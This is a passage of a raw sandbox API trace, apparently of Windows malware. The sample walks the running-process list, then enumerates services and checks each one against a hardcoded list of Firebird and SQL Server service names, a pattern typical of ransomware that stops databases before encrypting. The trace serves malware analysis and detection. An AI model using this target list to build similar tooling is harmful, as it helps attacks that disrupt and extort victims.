th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="statementswalkstramadol.exe")) returned 1 [0201.826] lstrlenW (lpString="statementswalkstramadol.exe") returned 27 [0201.826] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="playstation iraq.exe")) returned 1 [0203.109] lstrlenW (lpString="playstation iraq.exe") returned 20 [0203.109] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="harbor.exe")) returned 1 [0203.110] lstrlenW (lpString="harbor.exe") returned 10 [0203.111] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="promoting-walker-outdoor.exe")) returned 1 [0203.111] lstrlenW (lpString="promoting-walker-outdoor.exe") returned 28 [0203.112] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charlie_sperm_new.exe")) returned 1 [0203.112] lstrlenW (lpString="charlie_sperm_new.exe") returned 21 [0203.113] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="marie-lebanon.exe")) returned 1 [0203.113] lstrlenW (lpString="marie-lebanon.exe") returned 17 [0203.113] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="bad-length-especially.exe")) returned 1 [0203.114] lstrlenW (lpString="bad-length-especially.exe") returned 25 [0203.114] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="larent.exe")) returned 1 [0203.115] lstrlenW (lpString="larent.exe") returned 10 [0203.115] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="stereo.exe")) returned 1 [0203.116] lstrlenW (lpString="stereo.exe") returned 10 [0203.116] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge arrival racial.exe")) returned 1 [0203.117] lstrlenW (lpString="charge arrival racial.exe") returned 25 [0203.118] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="uniprotkbthusembassy.exe")) returned 1 [0203.119] lstrlenW (lpString="uniprotkbthusembassy.exe") returned 24 [0203.119] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x26c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="state.exe")) returned 1 [0203.120] lstrlenW (lpString="state.exe") returned 9 [0203.120] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0203.121] lstrlenW (lpString="TrustedInstaller.exe") returned 20 [0203.121] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0203.122] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0203.122] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0203.123] lstrlenW (lpString="taskhostw.exe") returned 13 [0203.123] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0203.124] lstrlenW (lpString="sppsvc.exe") returned 10 [0203.125] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.126] lstrlenW (lpString="svchost.exe") returned 11 [0203.126] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="Pg.exe")) returned 1 [0203.127] lstrlenW (lpString="Pg.exe") returned 6 [0203.127] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0203.128] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0203.128] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0203.129] lstrlenW (lpString="conhost.exe") returned 11 [0203.129] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0203.130] lstrlenW (lpString="cmd.exe") returned 7 [0203.130] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0203.131] lstrlenW (lpString="conhost.exe") returned 11 [0203.131] Process32NextW (in: hSnapshot=0x40c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0203.132] CloseHandle (hObject=0x40c) returned 1 [0203.132] Sleep (dwMilliseconds=0x1f4) [0203.740] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x236baa8 [0203.741] EnumServicesStatusExW (in: hSCManager=0x236baa8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 0 [0203.741] GetLastError () returned 0xea [0203.741] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x2090) returned 0x2372d70 [0203.741] EnumServicesStatusExW (in: hSCManager=0x236baa8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x2372d70, cbBufSize=0x2090, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x2372d70, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 1 [0203.742] CloseServiceHandle (hSCObject=0x236baa8) returned 1 [0203.742] lstrlenW (lpString="Appinfo") returned 7 [0203.742] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0203.742] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0203.742] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0203.742] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0203.743] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0203.743] lstrlenW (lpString="AppXSvc") returned 7 [0203.743] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0203.743] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0203.743] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0203.743] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0203.743] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0203.743] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0203.743] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0203.743] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0203.743] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0203.743] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0203.743] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0203.743] lstrlenW (lpString="Audiosrv") returned 8 [0203.743] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0203.743] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0203.743] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0203.743] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0203.743] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0203.743] lstrlenW (lpString="BFE") returned 3 [0203.743] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0203.743] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0203.743] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0203.743] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0203.743] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0203.743] lstrlenW (lpString="BITS") returned 4 [0203.743] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0203.743] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0203.743] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0203.743] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0203.743] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0203.743] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0203.744] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0203.744] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0203.744] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0203.744] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0203.744] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0203.744] lstrlenW (lpString="CDPSvc") returned 6 [0203.744] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0203.744] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0203.744] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0203.744] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0203.744] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0203.744] lstrlenW (lpString="ClickToRunSvc") returned 13 [0203.744] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0203.744] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0203.744] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0203.744] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0203.744] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0203.744] lstrlenW (lpString="ClipSVC") returned 7 [0203.744] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClipSVC") returned 1 [0203.744] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClipSVC") returned 1 [0203.744] lstrcmpiW (lpString1="sqlwriter", lpString2="ClipSVC") returned 1 [0203.744] lstrcmpiW (lpString1="mssqlserver", lpString2="ClipSVC") returned 1 [0203.744] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClipSVC") returned 1 [0203.744] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0203.744] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0203.744] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0203.744] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0203.744] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0203.744] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0203.744] lstrlenW (lpString="CryptSvc") returned 8 [0203.744] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0203.744] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0203.744] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0203.744] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0203.744] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0203.745] lstrlenW (lpString="DcomLaunch") returned 10 [0203.745] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0203.745] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0203.745] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0203.745] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0203.745] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0203.745] lstrlenW (lpString="DeviceAssociationService") returned 24 [0203.745] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0203.745] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0203.745] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0203.745] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0203.745] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0203.745] lstrlenW (lpString="Dhcp") returned 4 [0203.745] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0203.745] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0203.745] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0203.745] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0203.745] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0203.745] lstrlenW (lpString="Dnscache") returned 8 [0203.745] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0203.745] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0203.745] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0203.745] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0203.745] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0203.745] lstrlenW (lpString="DoSvc") returned 5 [0203.745] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0203.745] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0203.745] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0203.745] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0203.745] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0203.745] lstrlenW (lpString="DPS") returned 3 [0203.745] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0203.745] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0203.745] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0203.745] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0203.745] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0203.745] lstrlenW (lpString="DusmSvc") returned 7 [0203.745] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0203.746] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0203.746] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0203.746] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0203.746] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0203.746] lstrlenW (lpString="EventLog") returned 8 [0203.746] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0203.746] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0203.746] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0203.746] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0203.746] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0203.746] lstrlenW (lpString="EventSystem") returned 11 [0203.746] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0203.746] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0203.746] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0203.746] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0203.746] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0203.746] lstrlenW (lpString="FontCache") returned 9 [0203.746] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0203.746] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0203.746] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0203.746] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0203.746] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0203.746] lstrlenW (lpString="gpsvc") returned 5 [0203.746] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0203.746] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0203.746] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0203.746] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0203.746] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0203.746] lstrlenW (lpString="iphlpsvc") returned 8 [0203.746] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0203.746] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0203.746] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0203.746] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0203.746] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0203.746] lstrlenW (lpString="KeyIso") returned 6 [0203.746] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0203.746] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0203.746] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0203.747] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0203.747] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0203.747] lstrlenW (lpString="LanmanServer") returned 12 [0203.747] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0203.747] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0203.747] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0203.747] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0203.747] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0203.747] lstrlenW (lpString="LanmanWorkstation") returned 17 [0203.747] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0203.747] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0203.747] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0203.747] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0203.747] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0203.747] lstrlenW (lpString="lfsvc") returned 5 [0203.747] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0203.747] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0203.747] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0203.747] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0203.747] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0203.747] lstrlenW (lpString="LicenseManager") returned 14 [0203.747] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LicenseManager") returned -1 [0203.747] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LicenseManager") returned -1 [0203.747] lstrcmpiW (lpString1="sqlwriter", lpString2="LicenseManager") returned 1 [0203.747] lstrcmpiW (lpString1="mssqlserver", lpString2="LicenseManager") returned 1 [0203.747] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LicenseManager") returned 1 [0203.747] lstrlenW (lpString="lmhosts") returned 7 [0203.747] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0203.747] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0203.747] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0203.747] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0203.747] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0203.747] lstrlenW (lpString="LSM") returned 3 [0203.747] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0203.747] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0203.747] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0203.747] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0203.748] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0203.748] lstrlenW (lpString="MpsSvc") returned 6 [0203.748] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0203.748] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0203.748] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0203.748] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0203.748] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0203.748] lstrlenW (lpString="NcbService") returned 10 [0203.748] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0203.748] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0203.748] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0203.748] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0203.748] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0203.748] lstrlenW (lpString="netprofm") returned 8 [0203.748] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0203.748] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0203.748] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0203.748] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0203.748] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0203.748] lstrlenW (lpString="NlaSvc") returned 6 [0203.748] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0203.748] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0203.748] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0203.748] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0203.748] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0203.748] lstrlenW (lpString="nsi") returned 3 [0203.748] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0203.748] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0203.748] 